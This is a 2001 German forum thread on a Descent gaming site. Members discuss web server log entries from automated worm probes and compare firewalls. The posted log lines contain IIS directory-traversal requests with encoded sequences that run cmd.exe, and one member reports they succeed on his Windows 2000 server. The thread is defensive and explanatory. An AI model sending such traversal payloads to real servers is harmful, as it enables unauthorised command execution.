Descentforum.DE Forum Index Descentforum.DE
Search | FAQ | Memberlist | Usergroups | Newsfeed Newsfeed  Register
Profile | Log in to check your private messages | Log in 
Chat | D3-Tactics | Downloads | Map | Links | Serverlist | Teamspeak 

Hacker, Trojaner und andere...

 
Post new topic   Reply to topic    Descentforum.DE Forum Index -> Tech - Support - Forum
View previous topic :: View next topic  
Author Message
Bitch
Forum-Nutzer


Joined: 26 Feb 2001
Posts: 295
Location: Bremen [Germany]

PostPosted: 07.10.2001, 16:11    Post subject: Hacker, Trojaner und andere... Reply with quote

Schlimm, wenn man seinen Server ständig am Netz hängen hat...

Kleiner Auszug aus meinem Log-File für den Apache-Webserver unter Linux...


213.250.36.252 - - [06/Oct/2001:22:03:43 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
213.250.36.252 - - [06/Oct/2001:22:03:43 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.250.36.252 - - [06/Oct/2001:22:03:43 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.250.36.252 - - [06/Oct/2001:22:03:43 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.250.36.252 - - [06/Oct/2001:22:03:44 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.250.36.252 - - [06/Oct/2001:22:03:44 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.250.36.252 - - [06/Oct/2001:22:03:44 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
213.250.36.252 - - [06/Oct/2001:22:03:44 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.250.36.252 - - [06/Oct/2001:22:03:45 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.250.36.252 - - [06/Oct/2001:22:03:45 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.250.36.252 - - [06/Oct/2001:22:03:45 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.250.36.252 - - [06/Oct/2001:22:03:45 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
213.250.36.252 - - [06/Oct/2001:22:03:46 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
213.250.36.252 - - [06/Oct/2001:22:03:46 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.250.36.252 - - [06/Oct/2001:22:03:46 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312


Zum Glück nix passiert...wohl das falsche OS...
War das Code-Red?



greetings, b!tch
Back to top
View user's profile Send private message
Lex
Bytemaster


Joined: 06 Feb 2001
Posts: 351
Location: Switzerland

PostPosted: 07.10.2001, 16:54    Post subject: Reply with quote

Heh sieht ja interessant aus. Ich denke nicht dass das ein Virus oder Trojaner ist. Da hat einer versucht, cmd.exe über einen simplen GET request auszuführen.
Hier der Auszug aus der WHOIS Datenbank:
http://www.ripe.net/perl/whois?query=213.250.36.252+
Slowenien...naja...

Hmm..ein Widnows Webserver scheint aber tatsächlich irgendwie darauf zu reagieren.


------------------------------
Its not a bug. Its a feature.
Back to top
View user's profile Send private message
Maulwurf
aka Seeker


Joined: 17 Jul 2001
Posts: 2187
Location: Stuttgart

PostPosted: 07.10.2001, 17:08    Post subject: Reply with quote

hast du keinen firewall laufen?


... mehr
hits, mehr kicks ...
Back to top
View user's profile Send private message
Lex
Bytemaster


Joined: 06 Feb 2001
Posts: 351
Location: Switzerland

PostPosted: 07.10.2001, 17:30    Post subject: Reply with quote

Ach herie du scheisse.....Auf dem Win2k Webserver scheint das tatsächlich zu funktionieren! Na toll.....

Firewall nützt dich hier null und nix, weil das ein stink normaler URL request zum Webserver ist.


------------------------------
Its not a bug. Its a feature.
Back to top
View user's profile Send private message
Maulwurf
aka Seeker


Joined: 17 Jul 2001
Posts: 2187
Location: Stuttgart

PostPosted: 07.10.2001, 18:39    Post subject: Reply with quote

aha. (hab da ja null plan )
soviel zu sicherheit.


... mehr
hits, mehr kicks ...
Back to top
View user's profile Send private message
DJ-Fuck
Bricktop


Joined: 08 Feb 2001
Posts: 383
Location: Göttingen/Germany

PostPosted: 07.10.2001, 18:52    Post subject: Reply with quote

Hahahahaha Windows und sicher...2 Sachen die sich nicht vertragen...

...immer im Fadenkreuz...
Back to top
View user's profile Send private message Send e-mail
Bitch
Forum-Nutzer


Joined: 26 Feb 2001
Posts: 295
Location: Bremen [Germany]

PostPosted: 07.10.2001, 18:54    Post subject: Reply with quote

Deswegen ist mein gateway zum internet ja auch ein linux-rechner...

Bei Windows sollte man wohl echt nicht die Standardverzeichnisse (C:Winnt, usw.) nehmen, macht es den Typen dann wenigstens etwas schwieriger...

Firewall muss ich mal etwas abdichten, bis jetzt habe ich viele Ports offen.

@Seeker: Lex hat da völlig recht, die Anfrage kam ja auf port 80 (http) rein, da laufen ja nun normalerweise webserver...





greetings, b!tch
Back to top
View user's profile Send private message
Bitch
Forum-Nutzer


Joined: 26 Feb 2001
Posts: 295
Location: Bremen [Germany]

PostPosted: 09.10.2001, 11:02    Post subject: Reply with quote

Laut Virenbibliothek bei McAfee sind die Anfragen auf den Code Red Virus zurückzuführen.

[url]http://vil.nai.com/vil/virusSummary.asp?virus_k=99177[/url]



greetings, b!tch
Back to top
View user's profile Send private message
Lex
Bytemaster


Joined: 06 Feb 2001
Posts: 351
Location: Switzerland

PostPosted: 09.10.2001, 19:59    Post subject: Reply with quote

Heh frag mich nicht wieso mich das nicht wundert.......

Was doch sehr wundert ist dass der immer noch aktiv ist


------------------------------
Its not a bug. Its a feature.
Back to top
View user's profile Send private message
Do_Checkor
Administrator


Joined: 19 Nov 2000
Posts: 7768
Location: Oldenburg (Oldb.)

PostPosted: 09.10.2001, 20:09    Post subject: Reply with quote

ich bekomm so langsam das Dumme Gefühl das der auch hier irgendwie noch drin is

weil irgendwie is in diesem Forum der WURM drin !!
Back to top
View user's profile Send private message
Maulwurf
aka Seeker


Joined: 17 Jul 2001
Posts: 2187
Location: Stuttgart

PostPosted: 09.10.2001, 21:34    Post subject: Reply with quote

bei mir wird sowas aber geblockt:

A computer at IP address 62.54.76.129 has attempted an unsolicited connection to TCP port 80 on your machine.
TCP port 80 is commonly used by the World Wide Web HTTP service or program. HTTP is used to serve and request WWW pages.

was ich noch checken muss is das:

The source IP is on your local network. Click here for more information about what this means.


ich seh aber grad dass ich das auch von außerhalb hab. von dem her ...

neowatch! Smilie


... mehr
hits, mehr kicks ...
Back to top
View user's profile Send private message
Lex
Bytemaster


Joined: 06 Feb 2001
Posts: 351
Location: Switzerland

PostPosted: 09.10.2001, 22:21    Post subject: Reply with quote

Ja ich habe hier seit langem andauernd solche Anforderungen. So hab ich jetzt gleich schnell ein proggi geschrieben, das diese Attacken loggt. Und siehe da:
Das sind alles requests wie Bitch sie protokkoliert hat!

Ich werd jetzt mal ein bisschen loggen und das file dann zu meinem ISP senden.

Wenn jemand das tool haben will bitte melden...


------------------------------
Its not a bug. Its a feature.
Back to top
View user's profile Send private message
Dunka
Moderator


Joined: 15 Mar 2001
Posts: 191
Location: Bavaria

PostPosted: 10.10.2001, 09:00    Post subject: Reply with quote

Das muss nicht unbedingt der Virus selbst
sein. Auch möglich dass noch Trittbrettfahrer versuchen die Löcher auszunutzen die CodeRed gebohrt hat...

// This is a comment! I love comments
Back to top
View user's profile Send private message
Bitch
Forum-Nutzer


Joined: 26 Feb 2001
Posts: 295
Location: Bremen [Germany]

PostPosted: 10.10.2001, 11:04    Post subject: Reply with quote

Habe etwas mit ZoneAlarm herumprobiert, macht einen ganz guten Eindruck. Zu empfehlen, wenn man mit dem Rechner unter Windoofs direkt ins Netz geht ohne Firewall oder so dazwischen...

[url]http://www.zonealarm.com[/url]

Gibt's auch als Freeware-Version

Jo Lex, mail das Teil mal rüber, danke!


greetings, b!tch

Bearbeitet von - B!tch am 10/10/2001 11:06:46
Back to top
View user's profile Send private message
Maulwurf
aka Seeker


Joined: 17 Jul 2001
Posts: 2187
Location: Stuttgart

PostPosted: 10.10.2001, 11:27    Post subject: Reply with quote

das kann aber auch davon kommen, dass das ding lief wenn man descent spielt.
ich weiß nicht ob ich die richtige vorstellung hab von der funktionsweise von so nem firewall.
checkt der die pakete die ankommen, und schaut ob da so ein angriff oä mit reingepackt ist? weil vom server kommt ja ziemlich viel zurück und da kanns ja schon mal sein dass ein packet so nem angriffspacket ähnlich oder gleich schaut.
oder steh ich hier im wald?


... mehr
hits, mehr kicks ...
Back to top
View user's profile Send private message
DDevil
Forum-Nutzer


Joined: 26 Feb 2001
Posts: 598
Location: Cape Vere Islands

PostPosted: 10.10.2001, 13:38    Post subject: Reply with quote

Hier mal mein Senf:-)

ich habe jetzt schon mit mehreren Firewalls rumgespielt und nicht eine sagt mir zu.
Dieses immer wieder nachfragen ob erlaubt oder nicht empfinde ich als echt nervig.
Zumal ab und zu man echt nicht identifizieren kann ob das nun gecancelt werden kann oder nicht. Im schlimmsten Fall funktionieren auf einmal ein paar Sachen nicht mehr und man sucht dann wie verückt nach der Regel die das verhindert.

Apropo:-) Regel. Die meisten Firewalls arbeiten die Regeln von oben nach unten ab. D.h.
oben verboten, weiter unten ein bestimmter Teil erlaubt = verboten ! Keine Verbindung.
Ich versuch mal ein Beispiel:

Programm macht auf einem Port eine Anfrage raus die man nicht identifizieren kann und man verbietet diese Verbindung, da das Programm aber mehrere Ports öffnet bekommt man erstmal keine negative Nachricht, das Programm ( meistens Spiele ) wechselt nun auf Benutzeranforderung in einen anderen Modus ( z.B. Teilnahme an Spiel ) und braucht dazu nun wieder genau den Port den man eben noch gesperrt hat.Traurig(

So oder so ähnlich ist es mir gegangen. Direkte Deinstallation hat dann wieder alles zurecht gerückt.

Durch den Artikel in der aktuellen CT über Sicherheit etc. angestachelt habe ich mir die dort vorgestellte Firewall gesaugt und getestet. Alleine um in Multiplayer zukommen habe ich ca. 15x den ERLAUBEN Button angeklickt. Verwundert hat mich aller Dings das die Ports von D3 keiner Abfrage unterworfen wurden. Ätzend ist auf meinem System das ich D3 insgesamt 4x gestartet habe. Leider stürzt D3 bei mir ab wenn ich zurück auf den Desktop muss.Traurig((((

Muss halt jeder für sich selber wissen ob er ne Firewall braucht oder nicht.

Mein Rechner ist zum daddeln da und sonst nichts, also egal wenn abgeschossen, ne knappe Stunde und er rennt wieder.



DDevil
Back to top
View user's profile Send private message
Maulwurf
aka Seeker


Joined: 17 Jul 2001
Posts: 2187
Location: Stuttgart

PostPosted: 10.10.2001, 17:26    Post subject: Reply with quote

also bei NeoWatch kann ich sagen was passieren soll wenn so eine Anfrage kommt.
ich hab das so eingestellt, dass das tray icon uz blinken anfängt und sonst nix. fertig. --> null probleme --> null probleme beim spielen oder surfen Smilie


... mehr
hits, mehr kicks ...
Back to top
View user's profile Send private message
Lex
Bytemaster


Joined: 06 Feb 2001
Posts: 351
Location: Switzerland

PostPosted: 10.10.2001, 18:24    Post subject: Reply with quote

Zone alarm ist recht gut, ich schalt es allerdings ab wenn ich zocke.

@Seeker: Ja Du stehst da schon etwas im Wald. Eine Firewall blockiert einfach alle Anforderungen von aussen, bzw Zugriffe nach aussen, es sei denn der Benutzer erlaubt ausdrücklich den betreffenden TCP-Port. Normalerweidse werden keine Paketinhalte gescannt.

Hier das Tool: http://www.leual.ch/downloads/webview.zip
Es läuft aber nicht parallel zu einem Webserver! Diesen vorher deaktivieren.



Ähm..Checkor..wieso kann ich keine Dateien mehr uploaden?

------------------------------
Its not a bug. Its a feature.
Back to top
View user's profile Send private message
frog
Forum-Newbie


Joined: 03 Oct 2001
Posts: 3

PostPosted: 10.10.2001, 18:58    Post subject: Reply with quote

Hallo

Vielleicht kennt jemand ja diese Adresse noch nicht. Um einen EIGENEN Rechner zu testen, ist das die beste Seite die ich kenne:

[url]https://check.lfd.niedersachsen.de/Selbsttest/service/selbsttest.php[/url]

Grüße
frog

Back to top
View user's profile Send private message
Do_Checkor
Administrator


Joined: 19 Nov 2000
Posts: 7768
Location: Oldenburg (Oldb.)

PostPosted: 10.10.2001, 19:14    Post subject: Reply with quote

oops - naja - sorry aber bei den **zig Versuchen die Fehler im Forum auszumerzen hab ich ab nem bestimmten Punkt unsauber gearbeitet.

Manche Funkionen funzen nicht mehr, nicht mehr ganz oder es gibt Fehler - bitte meldet euch - dann versuch ich die Sachen zu klären...

da fonk... is something you can - errrrr - fonk.

Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Descentforum.DE Forum Index -> Tech - Support - Forum All times are GMT + 2 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum
PayPal


Descent is a trademark of Interplay Productions.
Descent, Descent II are © Parallax Software Corporation.
Descent III is © Outrage Entertainment.
Descentforum.DE and Descentforum.NET is © by Martin "Do_Checkor" Timmermann.
Powered by phpBB © 2001-2008 phpBB Group